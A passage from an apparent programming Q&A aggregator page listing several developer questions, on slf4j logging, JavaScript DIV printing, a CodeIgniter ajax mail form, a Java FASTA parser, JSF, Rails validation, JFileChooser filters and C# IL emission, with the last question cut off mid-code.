Attempt 2A: Copied slf4j-api-1.6.1.jar and slf4j-simple-1.6.1.jar into my WEB-INF/lib folder I also copied slf4j-log4j12-1.6.1.jar into my WEB-INF/lib folder Restarted Tomcat And VIOLA! I now have logging information going into my rails3.log file. So the big question is: WTF? Even though logging seems to be working now, I'm really not sure if I did this right. So like I said earlier, I'm really looking for some validation more or less. I'd also appreciate any pointers/tips/advice if you have any. Thanks!

    Read the article

  • Can't print elements in a DIV tag

    - by Mckenzi
    I am using a Drag-able and re-sizeable DIV's in this HTML file. Where the user will place the DIV tag to his desired place in a main parent DIV tag. Now I want to print this main DIV tag, but the problem is that the code which I'm using to PRINT this main DIV is printing in a sequence, like not the way user has arranged the DIV's. Also it doesn't take up the main DIV background IMAGE. here is the code. JAVASCRIPT & CSS <link rel="stylesheet" type="text/css" href="byrei-dyndiv_0.5.css"> <script type="text/javascript" src="http://jqueryjs.googlecode.com/files/jquery-1.3.1.min.js" > </script> <script type="text/javascript" src="byrei-dyndiv_1.0rc1.js"></script> <script language="javascript" type="text/javascript"> function change(boxid,divtoaffect) { content = document.getElementById("" + boxid + "").value.replace(/\n/g, '<br>'); document.getElementById(divtoaffect).innerHTML = content; } function select1() { test=document.getElementById("changeMe"); test.style.backgroundImage="url('Sunset.jpg')"; } function select2() { test=document.getElementById("changeMe"); test.style.backgroundImage="url('Blue hills.jpg')"; } function PrintElem(elem) { Popup($(elem).text()); } function Popup(data) { var mywindow = window.open('', 'my div', 'height=400,width=600'); mywindow.document.write('<html><head><title>my div</title>'); /*optional stylesheet*/ //mywindow.document.write('<link rel="stylesheet" href="main.css" type="text/css" />'); mywindow.document.write('</head><body >'); mywindow.document.write(data); mywindow.document.write('</body></html>'); mywindow.document.close(); mywindow.print(); return true; } // Print DIV function printContent(id){ str=document.getElementById(id).innerHTML newwin=window.open('','printwin','left=100,top=100,width=400,height=400') newwin.document.write('<HTML>\n<HEAD>\n') newwin.document.write('<TITLE>Print Page</TITLE>\n') newwin.document.write('<script>\n') newwin.document.write('function chkstate(){\n') newwin.document.write('if(document.readyState=="complete"){\n') newwin.document.write('window.close()\n') newwin.document.write('}\n') newwin.document.write('else{\n') newwin.document.write('setTimeout("chkstate()",2000)\n') newwin.document.write('}\n') newwin.document.write('}\n') newwin.document.write('function print_win(){\n') newwin.document.write('window.print();\n') newwin.document.write('chkstate();\n') newwin.document.write('}\n') newwin.document.write('<\/script>\n') newwin.document.write('</HEAD>\n') newwin.document.write('<BODY onload="print_win()">\n') newwin.document.write(str) newwin.document.write('</BODY>\n') newwin.document.write('</HTML>\n') newwin.document.close() } </script> </head> <body> <style type="text/css"> #output1,#output2 ,#output3 { width: 300px; word-wrap: break-word; border: solid 1px black; } </style> HTML <div style="width:650px;height:300px;" id="changeMe" > <table cellpadding="5" cellspacing="0" width="100%" style="margin:auto;"> <tr> <td><div class="dynDiv_moveDiv" id="output1" style="font-weight:bold;height:20px;margin-top:40px;"> <div class="dynDiv_resizeDiv_tl"></div> <div class="dynDiv_resizeDiv_tr"></div> <div class="dynDiv_resizeDiv_bl"></div> <div class="dynDiv_resizeDiv_br"></div> </div> </td> </tr> <tr> <td><div class="dynDiv_moveDiv" id="output2" style="height:40px;margin-top:30px;"> <div class="dynDiv_resizeDiv_tl"></div> <div class="dynDiv_resizeDiv_tr"></div> <div class="dynDiv_resizeDiv_bl"></div> <div class="dynDiv_resizeDiv_br"></div> </div></td> </tr> <tr> <td><div class="dynDiv_moveDiv" id="output3" style="height:50px;margin-top:40px;"> <div class="dynDiv_resizeDiv_tl"></div> <div class="dynDiv_resizeDiv_tr"></div> <div class="dynDiv_resizeDiv_bl"></div> <div class="dynDiv_resizeDiv_br"></div> </div></td> </tr> </table> </div> <tr> <td align="center"><input type="button" value="Print Div" onClick="printContent('changeMe')" /> </td> </tr>

    Read the article

  • Problem with ajax form on Codeigniter

    - by Code Burn
    Everytime I test the email is send correctly. (I have tested in PC: IE6, IE7, IE8, Safari, Firefox, Chrome. MAC: Safari, Firefox, Chrome.) Nome: Jon Doe Empresa: Star Cargo: Developer Email: [email protected] Telefone: 090909222988 Assunto: Subject here.. But I keep recieving emails like this from costumers: Nome: Empresa: Cargo: Email: Telefone: Assunto: CONTACT_FORM.PHP <form name="frm" id="frm"> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >Nome<font style="color:#EE3063;">*</font></div> <div class="campoFormulario inputDeCampo" ><input class="texto textocinzaescuro" size="31" name="Cnome" id="Cnome" value=""/></div> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >Empresa<font style="color:#EE3063;">*</font></div> <div class="campoFormulario inputDeCampo" ><input class="texto textocinzaescuro" size="31" name="CEmpresa" id="CEmpresa" value=""/></div> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >Cargo</div> <div class="campoFormulario inputDeCampo" ><input class="texto textocinzaescuro" size="31" name="CCargo" id="CCargo" value=""/></div> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >Email<font style="color:#EE3063;">*</font></div> <div class="campoFormulario inputDeCampo" ><input class="texto textocinzaescuro" size="31" name="CEmail" id="CEmail" value=""/></div> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >Telefone</div> <div class="campoFormulario inputDeCampo" ><input class="texto textocinzaescuro" size="31" name="CTelefone" id="CTelefone" value=""/></div> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >Assunto<font style="color:#EE3063;">*</font></div> <div class="campoFormulario inputDeCampo" ><textarea class="texto textocinzaescuro" name="CAssunto" id="CAssunto" rows="2" cols="28"></textarea></div> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >&nbsp;</div> <div class="campoFormulario inputDeCampo" style="text-align:right;" ><input id="Cbutton" class="texto textocinzaescuro" type="submit" name="submit" value="Enviar" /></div> </form> <script type="text/javascript"> $(function() { $("#Cbutton").click(function() { if(validarForm()){ var Cnome = $("input#Cnome").val(); var CEmpresa = $("input#CEmpresa").val(); var CEmail = $("input#CEmail").val(); var CCargo = $("input#CCargo").val(); var CTelefone = $("input#CTelefone").val(); var CAssunto = $("textarea#CAssunto").val(); var dataString = 'nome='+ Cnome + '&Empresa=' + CEmpresa + '&Email=' + CEmail + '&Cargo=' + CCargo + '&Telefone=' + CTelefone + '&Assunto=' + CAssunto; //alert (dataString);return false; $.ajax({ type: "POST", url: "http://www.myserver.com/index.php/pt/envia", data: dataString, success: function() { $('#frm').remove(); $('#blocoform').append("<br />Obrigado. <img id='checkmark' src='http://www.myserver.com/public/images/estrutura/ok.gif' /><br />Será contactado brevemente.<br /><br /><br /><br /><br /><br />") .hide() .fadeIn(1500); } }); } return false; }); }); function validarForm(){ var error = 0; if(!validateNome(document.getElementById("Cnome"))){ error = 1 ;} if(!validateNome(document.getElementById("CEmpresa"))){ error = 1 ;} if(!validateEmail(document.getElementById("CEmail"))){ error = 1 ;} if(!validateNome(document.getElementById("CAssunto"))){ error = 1 ;} if(error == 0){ //frm.submit(); return true; }else{ alert('Preencha os campos correctamente.'); return false; } } function validateNome(fld){ if( fld.value.length == 0 ){ fld.style.backgroundColor = '#FFFFCC'; //alert('Descrição é um campo obrigatório.'); return false; }else { fld.style.background = 'White'; return true; } } function trim(s) { return s.replace(/^\s+|\s+$/, ''); } function validateEmail(fld) { var tfld = trim(fld.value); var emailFilter = /^[^@]+@[^@.]+\.[^@]*\w\w$/ ; var illegalChars= /[\(\)\<\>\,\;\:\\\"\[\]]/ ; if (fld.value == "") { fld.style.background = '#FFFFCC'; //alert('Email é um campo obrigatório.'); return false; } else if (!emailFilter.test(tfld)) { //alert('Email inválido.'); fld.style.background = '#FFFFCC'; return false; } else if (fld.value.match(illegalChars)) { fld.style.background = '#FFFFCC'; //alert('Email inválido.'); return false; } else { fld.style.background = 'White'; return true; } } </script> FUNCTION ENVIA (email sender): function envia() { $this->load->helper(array('form', 'url')); $nome = $_POST['nome']; $empresa = $_POST['Empresa']; $cargo = $_POST['Cargo']; $email = $_POST['Email']; $telefone = $_POST['Telefone']; $assunto = $_POST['Assunto']; $mensagem = " Nome:".$nome." Empresa:".$empresa." Cargo:".$cargo." Email:".$email." Telefone:".$telefone." Assunto:".$assunto.""; $headers = 'From: [email protected]' . "\r\n" . 'Reply-To: no-reply' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); mail('[email protected]', $mensagem, $headers); }

    Read the article

  • Parse a text file into multiple text file

    - by Vijay Kumar Singh
    I want to get multiple file by parsing a input file Through Java. The Input file contains many fasta format of thousands of protein sequence and I want to generate raw format(i.e., without any comma semicolon and without any extra symbol like "", "[", "]" etc) of each protein sequence. A fasta sequence starts form "" symbol followed by description of protein and then sequence of protein. For example ? lcl|NC_000001.10_cdsid_XP_003403591.1 [gene=LOC100652771] [protein=hypothetical protein LOC100652771] [protein_id=XP_003403591.1] [location=join(12190..12227,12595..12721,13403..13639)] MSESINFSHNLGQLLSPPRCVVMPGMPFPSIRSPELQKTTADLDHTLVSVPSVAESLHHPEITFLTAFCL PSFTRSRPLPDRQLHHCLALCPSFALPAGDGVCHGPGLQGSCYKGETQESVESRVLPGPRHRH Like above formate the input file contains 1000s of protein sequence. I have to generate thousands of raw file containing only individual protein sequence without any special symbol or gaps. I have developed the code for it in Java but out put is : Cannot open a file followed by cannot find file. Please help me to solve my problem. Regards Vijay Kumar Garg Varanasi Bharat (India) The code is /*Java code to convert FASTA format to a raw format*/ import java.io.*; import java.util.*; import java.util.regex.*; import java.io.FileInputStream; // java package for using regular expression public class Arrayren { public static void main(String args[]) throws IOException { String a[]=new String[1000]; String b[][] =new String[1000][1000]; /*open the id file*/ try { File f = new File ("input.txt"); //opening the text document containing genbank ids FileInputStream fis = new FileInputStream("input.txt"); //Reading the file contents through inputstream BufferedInputStream bis = new BufferedInputStream(fis); // Writing the contents to a buffered stream DataInputStream dis = new DataInputStream(bis); //Method for reading Java Standard data types String inputline; String line; String separator = System.getProperty("line.separator"); // reads a line till next line operator is found int i=0; while ((inputline=dis.readLine()) != null) { i++; a[i]=inputline; a[i]=a[i].replaceAll(separator,""); //replaces unwanted patterns like /n with space a[i]=a[i].trim(); // trims out if any space is available a[i]=a[i]+".txt"; //takes the file name into an array try // to handle run time error /*take the sequence in to an array*/ { BufferedReader in = new BufferedReader (new FileReader(a[i])); String inline = null; int j=0; while((inline=in.readLine()) != null) { j++; b[i][j]=inline; Pattern q=Pattern.compile(">"); //Compiling the regular expression Matcher n=q.matcher(inline); //creates the matcher for the above pattern if(n.find()) { /*appending the comment line*/ b[i][j]=b[i][j].replaceAll(">gi",""); //identify the pattern and replace it with a space b[i][j]=b[i][j].replaceAll("[a-zA-Z]",""); b[i][j]=b[i][j].replaceAll("|",""); b[i][j]=b[i][j].replaceAll("\\d{1,15}",""); b[i][j]=b[i][j].replaceAll(".",""); b[i][j]=b[i][j].replaceAll("_",""); b[i][j]=b[i][j].replaceAll("\\(",""); b[i][j]=b[i][j].replaceAll("\\)",""); } /*printing the sequence in to a text file*/ b[i][j]=b[i][j].replaceAll(separator,""); b[i][j]=b[i][j].trim(); // trims out if any space is available File create = new File(inputline+"R.txt"); try { if(!create.exists()) { create.createNewFile(); // creates a new file } else { System.out.println("file already exists"); } } catch(IOException e) // to catch the exception and print the error if cannot open a file { System.err.println("cannot create a file"); } BufferedWriter outt = new BufferedWriter(new FileWriter(inputline+"R.txt", true)); outt.write(b[i][j]); // printing the contents to a text file outt.close(); // closing the text file System.out.println(b[i][j]); } } catch(Exception e) { System.out.println("cannot open a file"); } } } catch(Exception ex) // catch the exception and prints the error if cannot find file { System.out.println("cannot find file "); } } } If you provide me correct it will be much easier to understand.

    Read the article

  • mvc3 datatabels and ajax-beginform

    - by MIkCode
    im trying to send and ajax request and returning the result into a new table i debugged the req and i can confirm that evry thing is good except the VIEW the end result is an empty table instead of one row one more weird thing is if i page source i can see all the table result(more than the one that suppose to) this is the view: @model Fnx.Esb.ServiceMonitor.ViewModel.MainModels @{ ViewBag.Title = "MainSearch"; } @Html.EditorForModel() @{ AjaxOptions ajaxOpts = new AjaxOptions { UpdateTargetId = "MainTable", InsertionMode = InsertionMode.Replace, Url = Url.Action("queryData", "MainSearch"), }; } @using (Ajax.BeginForm(ajaxOpts)) { <div class="container"> <form action="#" method="post"> <div id="mainSearch"> @Html.EditorFor(x => x.MainSearchModel) </div> <br /> <br /> <br /> <br /> <div id="advancedSearch"> <div class="accordion" id="accordion2"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#accordion2" href="#collapseOne"> Advanced Search </a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> @Html.EditorFor(x => x.AdvanceSearchContainerModel) </div> </div> </div> </div> </div> <br /> <br /> <button type="submit" class="btn"> <i class="icon-search"></i> Search </button> <button type="reset" class="btn"> <i class="icon-trash"></i> clear </button> </form> <br /> <br /> <br /> <br /> <br /> <br /> <table id="MainTable" cellpadding="0" cellspacing="0" border="0" class="table table-striped table-bordered"> <thead> <tr> <th> serviceDuration </th> <th> status </th> <th> ESBLatency </th> <th> serviceName </th> <th> serviceId </th> <th> startTime </th> <th> endTime </th> <th> instanceID </th> </tr> </thead> <tbody> @foreach (var item in Model.MainTableModel) { <tr> <td> @Html.DisplayFor(modelItem => item.serviceDuration) </td> <td> @Html.DisplayFor(modelItem => item.status) </td> <td> @Html.DisplayFor(modelItem => item.ESBLatency) </td> <td> @Html.DisplayFor(modelItem => item.serviceName) </td> <td> @Html.DisplayFor(modelItem => item.serviceId) </td> <td> @Html.DisplayFor(modelItem => item.startTime) </td> <td> @Html.DisplayFor(modelItem => item.endTime) </td> <td> @Html.DisplayFor(modelItem => item.instanceID) </td> </tr> } </tbody> </table> </div> } the datatables: javascript options $('#MainTable').dataTable({ "sDom": "<'row'<'span6'l><'span6'f>r>t<'row'<'span6'i><'span6'p>>", "bDestroy": true }); thanks miki

    Read the article

  • JSF 2 -- Composite component with optional listener attribute on f:ajax

    - by Dave Maple
    I have a composite component that looks something like this: <!DOCTYPE html> <html xmlns:h="http://java.sun.com/jsf/html" xmlns:f="http://java.sun.com/jsf/core" xmlns:dm="http://davemaple.com/dm-taglib" xmlns:rich="http://richfaces.org/rich" xmlns:cc="http://java.sun.com/jsf/composite" xmlns:fn="http://java.sun.com/jsp/jstl/functions" xmlns:ui="http://java.sun.com/jsf/facelets" xmlns:a4j="http://richfaces.org/a4j"> <cc:interface> <cc:attribute name="styleClass" /> <cc:attribute name="textBoxStyleClass" /> <cc:attribute name="inputTextId" /> <cc:attribute name="labelText" /> <cc:attribute name="tabindex" /> <cc:attribute name="required" default="false" /> <cc:attribute name="requiredMessage" /> <cc:attribute name="validatorId" /> <cc:attribute name="converterId" /> <cc:attribute name="title"/> <cc:attribute name="style"/> <cc:attribute name="unicodeSupport" default="false"/> <cc:attribute name="tooltip" default="false"/> <cc:attribute name="tooltipText" default=""/> <cc:attribute name="tooltipText" default=""/> <cc:attribute name="onfail" default=""/> <cc:attribute name="onpass" default=""/> </cc:interface> <cc:implementation> <ui:param name="converterId" value="#{! empty cc.attrs.converterId ? cc.attrs.converterId : 'universalConverter'}" /> <ui:param name="validatorId" value="#{! empty cc.attrs.validatorId ? cc.attrs.validatorId : 'universalValidator'}" /> <ui:param name="component" value="#{formFieldBean.getComponent(cc.attrs.inputTextId)}" /> <ui:param name="componentValid" value="#{((facesContext.maximumSeverity == null and empty component.valid) or component.valid) ? true : false}" /> <ui:param name="requiredMessage" value="#{! empty cc.attrs.requiredMessage ? cc.attrs.requiredMessage : msg['validation.generic.requiredMessage']}" /> <ui:param name="clientIdEscaped" value="#{fn:replace(cc.clientId, ':', '\\\\\\\\:')}" /> <h:panelGroup layout="block" id="#{cc.attrs.inputTextId}ValidPanel" style="display:none;"> <input type="hidden" id="#{cc.attrs.inputTextId}Valid" value="#{componentValid}" /> </h:panelGroup> <dm:outputLabel for="#{cc.clientId}:#{cc.attrs.inputTextId}" id="#{cc.attrs.inputTextId}Label">#{cc.attrs.labelText}</dm:outputLabel> <dm:inputText styleClass="#{cc.attrs.textBoxStyleClass}" tabindex="#{cc.attrs.tabindex}" id="#{cc.attrs.inputTextId}" required="#{cc.attrs.required}" requiredMessage="#{requiredMessage}" title="#{cc.attrs.title}" unicodeSupport="#{cc.attrs.unicodeSupport}"> <f:validator validatorId="#{validatorId}" /> <f:converter converterId="#{converterId}" /> <cc:insertChildren /> <f:ajax event="blur" execute="@this" render="#{cc.attrs.inputTextId}ValidPanel #{cc.attrs.inputTextId}Msg" onevent="on#{cc.attrs.inputTextId}Event" /> </dm:inputText> <rich:message for="#{cc.clientId}:#{cc.attrs.inputTextId}" id="#{cc.attrs.inputTextId}Msg" style="display: none;" /> <script> function on#{cc.attrs.inputTextId}Event(e) { if(e.status == 'success') { $('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}').trigger($('##{cc.attrs.inputTextId}Valid').val()=='true'?'pass':'fail'); } } $('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}').bind('fail', function() { $('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}, ##{clientIdEscaped}\\:#{cc.attrs.inputTextId}Label, ##{cc.attrs.inputTextId}Msg, ##{cc.id}Msg').addClass('error'); $('##{cc.id}Msg').html($('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}Msg').html()); #{cc.attrs.onfail} }).bind('pass', function() { $('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}, ##{clientIdEscaped}\\:#{cc.attrs.inputTextId}Label, ##{cc.attrs.inputTextId}Msg, ##{cc.id}Msg').removeClass('error'); $('##{cc.id}Msg').html($('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}Msg').html()); #{cc.attrs.onpass} }); </script> <a4j:region rendered="#{facesContext.maximumSeverity != null and !componentValid}"> <script> $(document).ready(function() { $('##{clientIdEscaped}\\:#{cc.attrs.inputTextId}').trigger('fail'); }); </script> </a4j:region> </cc:implementation> </html> I'd like to be able to add an optional "listener" attribute which if defined would add an event listener to my f:ajax but I'm having trouble figuring out how to accomplish this. Any help would be appreciated.

    Read the article

  • Custom validation works in development but not in unit test

    - by Geolev
    I want to validate that at least one of two columns have a value in my model. I found somewhere on the web that I could create a custom validator as follows: # Check for the presence of one or another field: # :validates_presence_of_at_least_one_field :last_name, :company_name - would require either last_name or company_name to be filled in # also works with arrays # :validates_presence_of_at_least_one_field :email, [:name, :address, :city, :state] - would require email or a mailing type address module ActiveRecord module Validations module ClassMethods def validates_presence_of_at_least_one_field(*attr_names) msg = attr_names.collect {|a| a.is_a?(Array) ? " ( #{a.join(", ")} ) " : a.to_s}.join(", ") + "can't all be blank. At least one field must be filled in." configuration = { :on => :save, :message => msg } configuration.update(attr_names.extract_options!) send(validation_method(configuration[:on]), configuration) do |record| found = false attr_names.each do |a| a = [a] unless a.is_a?(Array) found = true a.each do |attr| value = record.respond_to?(attr.to_s) ? record.send(attr.to_s) : record[attr.to_s] found = !value.blank? end break if found end record.errors.add_to_base(configuration[:message]) unless found end end end end end I put this in a file called lib/acs_validator.rb in my project and added "require 'acs_validator'" to my environment.rb. This does exactly what I want. It works perfectly when I manually test it in the development environment but when I write a unit test it breaks my test environment. This is my unit test: require 'test_helper' class CustomerTest < ActiveSupport::TestCase # Replace this with your real tests. test "the truth" do assert true end test "customer not valid" do puts "customer not valid" customer = Customer.new assert !customer.valid? assert customer.errors.invalid?(:subdomain) assert_equal "Company Name and Last Name can't both be blank.", customer.errors.on(:contact_lname) end end This is my model: class Customer < ActiveRecord::Base validates_presence_of :subdomain validates_presence_of_at_least_one_field :customer_company_name, :contact_lname, :message => "Company Name and Last Name can't both be blank." has_one :service_plan end When I run the unit test, I get the following error: DEPRECATION WARNING: Rake tasks in vendor/plugins/admin_data/tasks, vendor/plugins/admin_data/tasks, and vendor/plugins/admin_data/tasks are deprecated. Use lib/tasks instead. (called from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/tasks/rails.rb:10) Couldn't drop acs_test : #<ActiveRecord::StatementInvalid: PGError: ERROR: database "acs_test" is being accessed by other users DETAIL: There are 1 other session(s) using the database. : DROP DATABASE IF EXISTS "acs_test"> acs_test already exists NOTICE: CREATE TABLE will create implicit sequence "customers_id_seq" for serial column "customers.id" NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "customers_pkey" for table "customers" NOTICE: CREATE TABLE will create implicit sequence "service_plans_id_seq" for serial column "service_plans.id" NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "service_plans_pkey" for table "service_plans" /usr/bin/ruby1.8 -I"lib:test" "/usr/lib/ruby/gems/1.8/gems/rake-0.8.7/lib/rake/rake_test_loader.rb" "test/unit/customer_test.rb" "test/unit/service_plan_test.rb" "test/unit/helpers/dashboard_helper_test.rb" "test/unit/helpers/customers_helper_test.rb" "test/unit/helpers/service_plans_helper_test.rb" /usr/lib/ruby/gems/1.8/gems/activerecord-2.3.8/lib/active_record/base.rb:1994:in `method_missing_without_paginate': undefined method `validates_presence_of_at_least_one_field' for #<Class:0xb7076bd0> (NoMethodError) from /usr/lib/ruby/gems/1.8/gems/will_paginate-2.3.12/lib/will_paginate/finder.rb:170:in `method_missing' from /home/george/projects/advancedcomfortcs/app/models/customer.rb:3 from /usr/local/lib/site_ruby/1.8/rubygems/custom_require.rb:31:in `gem_original_require' from /usr/local/lib/site_ruby/1.8/rubygems/custom_require.rb:31:in `require' from /usr/lib/ruby/gems/1.8/gems/activesupport-2.3.8/lib/active_support/dependencies.rb:158:in `require' from /usr/lib/ruby/gems/1.8/gems/activesupport-2.3.8/lib/active_support/dependencies.rb:265:in `require_or_load' from /usr/lib/ruby/gems/1.8/gems/activesupport-2.3.8/lib/active_support/dependencies.rb:224:in `depend_on' from /usr/lib/ruby/gems/1.8/gems/activesupport-2.3.8/lib/active_support/dependencies.rb:136:in `require_dependency' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:414:in `load_application_classes' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:413:in `each' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:413:in `load_application_classes' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:411:in `each' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:411:in `load_application_classes' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:197:in `process' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:113:in `send' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:113:in `run' from /home/george/projects/advancedcomfortcs/config/environment.rb:9 from ./test/test_helper.rb:2:in `require' from ./test/test_helper.rb:2 from ./test/unit/customer_test.rb:1:in `require' from ./test/unit/customer_test.rb:1 from /usr/lib/ruby/gems/1.8/gems/rake-0.8.7/lib/rake/rake_test_loader.rb:5:in `load' from /usr/lib/ruby/gems/1.8/gems/rake-0.8.7/lib/rake/rake_test_loader.rb:5 from /usr/lib/ruby/gems/1.8/gems/rake-0.8.7/lib/rake/rake_test_loader.rb:5:in `each' from /usr/lib/ruby/gems/1.8/gems/rake-0.8.7/lib/rake/rake_test_loader.rb:5 rake aborted! Command failed with status (1): [/usr/bin/ruby1.8 -I"lib:test" "/usr/lib/ru...] (See full trace by running task with --trace) It seems to have stepped on will_paginate somehow. Does anyone have any suggestions? Is there another way to do the validation I'm attempting to do? Thanks, George

    Read the article

  • adjust selected File to FileFilter in a JFileChooser

    - by amarillion
    I'm writing a diagram editor in java. This app has the option to export to various standard image formats such as .jpg, .png etc. When the user clicks File-Export, you get a JFileChooser which has a number of FileFilters in it, for .jpg, .png etc. Now here is my question: Is there a way to have the extension of the default adjust to the selected file filter? E.g. if the document is named "lolcat" then the default option should be "lolcat.png" when the png filter is selected, and when the user selects the jpg file filter, the default should change to "lolcat.jpg" automatically. Is this possible? How can I do it? edit: Based on the answer below, I wrote some code. But it doesn't quite work yet. I've added a propertyChangeListener to the FILE_FILTER_CHANGED_PROPERTY, but it seems that within this method getSelectedFile() returns null. Here is the code. package nl.helixsoft; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; import java.beans.PropertyChangeEvent; import java.beans.PropertyChangeListener; import java.io.File; import java.util.ArrayList; import java.util.List; import javax.swing.JButton; import javax.swing.JFileChooser; import javax.swing.JFrame; import javax.swing.filechooser.FileFilter; public class JFileChooserTest { public class SimpleFileFilter extends FileFilter { private String desc; private List<String> extensions; private boolean showDirectories; /** * @param name example: "Data files" * @param glob example: "*.txt|*.csv" */ public SimpleFileFilter (String name, String globs) { extensions = new ArrayList<String>(); for (String glob : globs.split("\\|")) { if (!glob.startsWith("*.")) throw new IllegalArgumentException("expected list of globs like \"*.txt|*.csv\""); // cut off "*" // store only lower case (make comparison case insensitive) extensions.add (glob.substring(1).toLowerCase()); } desc = name + " (" + globs + ")"; } public SimpleFileFilter(String name, String globs, boolean showDirectories) { this(name, globs); this.showDirectories = showDirectories; } @Override public boolean accept(File file) { if(showDirectories && file.isDirectory()) { return true; } String fileName = file.toString().toLowerCase(); for (String extension : extensions) { if (fileName.endsWith (extension)) { return true; } } return false; } @Override public String getDescription() { return desc; } /** * @return includes '.' */ public String getFirstExtension() { return extensions.get(0); } } void export() { String documentTitle = "lolcat"; final JFileChooser jfc = new JFileChooser(); jfc.setDialogTitle("Export"); jfc.setDialogType(JFileChooser.SAVE_DIALOG); jfc.setSelectedFile(new File (documentTitle)); jfc.addChoosableFileFilter(new SimpleFileFilter("JPEG", "*.jpg")); jfc.addChoosableFileFilter(new SimpleFileFilter("PNG", "*.png")); jfc.addPropertyChangeListener(JFileChooser.FILE_FILTER_CHANGED_PROPERTY, new PropertyChangeListener() { public void propertyChange(PropertyChangeEvent arg0) { System.out.println ("Property changed"); String extold = null; String extnew = null; if (arg0.getOldValue() == null || !(arg0.getOldValue() instanceof SimpleFileFilter)) return; if (arg0.getNewValue() == null || !(arg0.getNewValue() instanceof SimpleFileFilter)) return; SimpleFileFilter oldValue = ((SimpleFileFilter)arg0.getOldValue()); SimpleFileFilter newValue = ((SimpleFileFilter)arg0.getNewValue()); extold = oldValue.getFirstExtension(); extnew = newValue.getFirstExtension(); String filename = "" + jfc.getSelectedFile(); System.out.println ("file: " + filename + " old: " + extold + ", new: " + extnew); if (filename.endsWith(extold)) { filename.replace(extold, extnew); } else { filename += extnew; } jfc.setSelectedFile(new File (filename)); } }); jfc.showDialog(frame, "export"); } JFrame frame; void run() { frame = new JFrame(); JButton btn = new JButton ("export"); frame.add (btn); btn.addActionListener (new ActionListener() { public void actionPerformed(ActionEvent ae) { export(); } }); frame.setSize (300, 300); frame.pack(); frame.setVisible(true); } public static void main(String[] args) { javax.swing.SwingUtilities.invokeLater(new Runnable() { public void run() { JFileChooserTest x = new JFileChooserTest(); x.run(); } }); } }

    Read the article

  • Dynamic object property populator (without reflection)

    - by grenade
    I want to populate an object's properties without using reflection in a manner similar to the DynamicBuilder on CodeProject. The CodeProject example is tailored for populating entities using a DataReader or DataRecord. I use this in several DALs to good effect. Now I want to modify it to use a dictionary or other data agnostic object so that I can use it in non DAL code --places I currently use reflection. I know almost nothing about OpCodes and IL. I just know that it works well and is faster than reflection. I have tried to modify the CodeProject example and because of my ignorance with IL, I have gotten stuck on two lines. One of them deals with dbnulls and I'm pretty sure I can just lose it, but I don't know if the lines preceding and following it are related and which of them will also need to go. The other, I think, is the one that pulled the value out of the datarecord before and now needs to pull it out of the dictionary. I think I can replace the "getValueMethod" with my "property.Value" but I'm not sure. I'm open to alternative/better ways of skinning this cat too. Here's the code so far (the commented out lines are the ones I'm stuck on): using System; using System.Collections.Generic; using System.Reflection; using System.Reflection.Emit; public class Populator<T> { private delegate T Load(Dictionary<string, object> properties); private Load _handler; private Populator() { } public T Build(Dictionary<string, object> properties) { return _handler(properties); } public static Populator<T> CreateBuilder(Dictionary<string, object> properties) { //private static readonly MethodInfo getValueMethod = typeof(IDataRecord).GetMethod("get_Item", new [] { typeof(int) }); //private static readonly MethodInfo isDBNullMethod = typeof(IDataRecord).GetMethod("IsDBNull", new [] { typeof(int) }); Populator<T> dynamicBuilder = new Populator<T>(); DynamicMethod method = new DynamicMethod("Create", typeof(T), new[] { typeof(Dictionary<string, object>) }, typeof(T), true); ILGenerator generator = method.GetILGenerator(); LocalBuilder result = generator.DeclareLocal(typeof(T)); generator.Emit(OpCodes.Newobj, typeof(T).GetConstructor(Type.EmptyTypes)); generator.Emit(OpCodes.Stloc, result); int i = 0; foreach (var property in properties) { PropertyInfo propertyInfo = typeof(T).GetProperty(property.Key, BindingFlags.Public | BindingFlags.Instance | BindingFlags.IgnoreCase | BindingFlags.FlattenHierarchy | BindingFlags.Default); Label endIfLabel = generator.DefineLabel(); if (propertyInfo != null && propertyInfo.GetSetMethod() != null) { generator.Emit(OpCodes.Ldarg_0); generator.Emit(OpCodes.Ldc_I4, i); //generator.Emit(OpCodes.Callvirt, isDBNullMethod); generator.Emit(OpCodes.Brtrue, endIfLabel); generator.Emit(OpCodes.Ldloc, result); generator.Emit(OpCodes.Ldarg_0); generator.Emit(OpCodes.Ldc_I4, i); //generator.Emit(OpCodes.Callvirt, getValueMethod); generator.Emit(OpCodes.Unbox_Any, property.Value.GetType()); generator.Emit(OpCodes.Callvirt, propertyInfo.GetSetMethod()); generator.MarkLabel(endIfLabel); } i++; } generator.Emit(OpCodes.Ldloc, result); generator.Emit(OpCodes.Ret); dynamicBuilder._handler = (Load)method.CreateDelegate(typeof(Load)); return dynamicBuilder; } } EDIT: Using Marc Gravell's PropertyDescriptor implementation (with HyperDescriptor) the code is simplified a hundred-fold. I now have the following test: using System; using System.Collections.Generic; using System.ComponentModel; using 